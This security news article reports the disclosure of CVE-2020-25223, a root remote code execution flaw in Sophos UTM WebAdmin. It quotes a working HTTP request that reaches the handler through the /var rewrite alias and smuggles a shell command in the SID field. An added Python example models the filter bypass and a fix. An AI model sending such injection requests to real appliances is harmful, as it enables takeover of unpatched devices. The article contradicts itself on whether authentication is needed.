Are you using a Sophos UTM appliance? Be sure it is up to date!

Pierluigi Paganini August 23, 2021

A researcher has disclosed technical details of a critical remote code execution vulnerability in Sophos UTM, tracked as CVE-2020-25223, that was patched last year.

In September 2020, Sophos addressed a remote code execution vulnerability (CVE-2020-25223) in the WebAdmin interface of SG UTM that had been reported through the company's bug bounty program. At the time, the vendor said there was no evidence that the vulnerability had been exploited in attacks in the wild.


Researcher Justin Kennedy of security consultancy Atredis Partners has now disclosed the technical details of the RCE. He analyzed vulnerable UTM devices used by one of the firm's customers and compared the patched and unpatched versions of the software to determine how the issue was fixed and how it could be exploited.

“When looking for the details on a known patched bug, I started off the same way any sane person would, comparing the differences between an unpatched version and a patched version.” explained the expert in a blog post. “I grabbed ISOs for versions 9.510-5 and 9.511-2 of the Sophos UTM platform and spun them up in a lab environment. Truth be told I ended up spinning up six different versions, but the two I mentioned were what I ended up comparing in the end.”

The expert found that the vulnerability was quite easy to trigger: an attacker could exploit the flaw by sending a single HTTP request to a vulnerable device.

If the WebAdmin of Sophos SG UTM was exposed, only a remote authenticated attacker could easily exploit it.

“After spending some time attempting to bypass the regex and try different payloads, I had a thought… This input filter only triggers when the location matches webadmin.plx.” explained the expert. “And then I saw it and it was beautiful:

RewriteRule ^/var /webadmin.plx

Making an HTTP request to the /var endpoint is the same as making a request to the /webadmin.plx endpoint, but without the filter. Making the request again, but to the new endpoint:

POST /var HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-type: application/json; charset=UTF-8
Content-Length: 227
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"objs": [{"FID": "init"}], "SID": "|touch /tmp/pwned|", "browser": "gecko_linux", "backend_version": -1, "loc": "", "_cookie": null, "wdebug": 0, "RID": "1629210675639_0.5000855117488202", "current_uuid": "", "ipv6": true}

And here’s our file:

# ls -l /tmp/pwned
-rw-r--r-- 1 root root 0 Aug 17 17:07 /tmp/pwned

We now have unauthenticated RCE on the Sophos UTM appliance as the root user.
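The bypass quoted above comes down to where the input check was enforced: it was keyed on the raw request path matching webadmin.plx, while a server-side rewrite let /var reach the same handler without ever passing through it. The Python below is an added example (not code from the original post, from Atredis Partners, or from Sophos) that models that mistake and the corrected placement of the check. The alias table mirrors the quoted RewriteRule; the rule that a legitimate session id is purely alphanumeric, the sample request bodies and the function names are all assumptions constructed for this illustration.

```python
import json
import re

# Added example, not Atredis or Sophos code. It models the filter-placement
# mistake described in the post: an input check keyed on the raw request path
# is skipped when a server-side rewrite aliases another path to the same handler.

# Alias modelled on the RewriteRule quoted above: /var -> /webadmin.plx
REWRITE_RULES = [(re.compile(r"^/var"), "/webadmin.plx")]

# Assumption for this example: a legitimate session id is purely alphanumeric,
# so shell metacharacters such as '|' never belong in it.
SESSION_ID_OK = re.compile(r"^[A-Za-z0-9]+$")


def resolve_alias(path):
    """Return the handler path the server actually dispatches to after rewrites."""
    for pattern, target in REWRITE_RULES:
        if pattern.search(path):
            return pattern.sub(target, path, count=1)
    return path


def session_id_is_clean(body):
    """Parse the JSON body and check that its SID field is a plain token."""
    try:
        sid = json.loads(body).get("SID")
    except (ValueError, AttributeError):
        return False
    return isinstance(sid, str) and SESSION_ID_OK.match(sid) is not None


def flawed_filter(path, body):
    """The check as the post describes it: it only runs when the raw location
    matches webadmin.plx, so an aliased path never reaches it."""
    if path.endswith("webadmin.plx"):
        return session_id_is_clean(body)
    return True


def hardened_filter(path, body):
    """Same check, applied to the resolved handler path instead of the raw one."""
    if resolve_alias(path).endswith("webadmin.plx"):
        return session_id_is_clean(body)
    return True


def audit(requests, check):
    """Run a filter over (path, body) pairs; return the paths it would let through."""
    return [path for path, body in requests if check(path, body)]


# Constructed sample requests. The first body reuses the SID from the request
# shown above; the second carries a benign session id.
HOSTILE_BODY = json.dumps({"objs": [{"FID": "init"}], "SID": "|touch /tmp/pwned|"})
BENIGN_BODY = json.dumps({"objs": [{"FID": "init"}], "SID": "a1b2c3d4e5f6"})
SAMPLE_REQUESTS = [
    ("/webadmin.plx", HOSTILE_BODY),
    ("/var", HOSTILE_BODY),
    ("/webadmin.plx", BENIGN_BODY),
    ("/var", BENIGN_BODY),
]

if __name__ == "__main__":
    print("flawed filter lets through:  ", audit(SAMPLE_REQUESTS, flawed_filter))
    print("hardened filter lets through:", audit(SAMPLE_REQUESTS, hardened_filter))
```

Run stand-alone, the flawed filter lets the hostile body through on /var while the hardened one rejects it on both spellings of the URL. The broader lesson for anyone maintaining a web front end is that a check attached to one spelling of a URL is only as good as the rewrite table in front of it; the check belongs in the handler that consumes the value, and a value that is later handed to a shell should never be built from request input in the first place, with the filter serving only as defense in depth.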

Organizations running vulnerable versions of the Sophos UTM appliance should update them immediately.
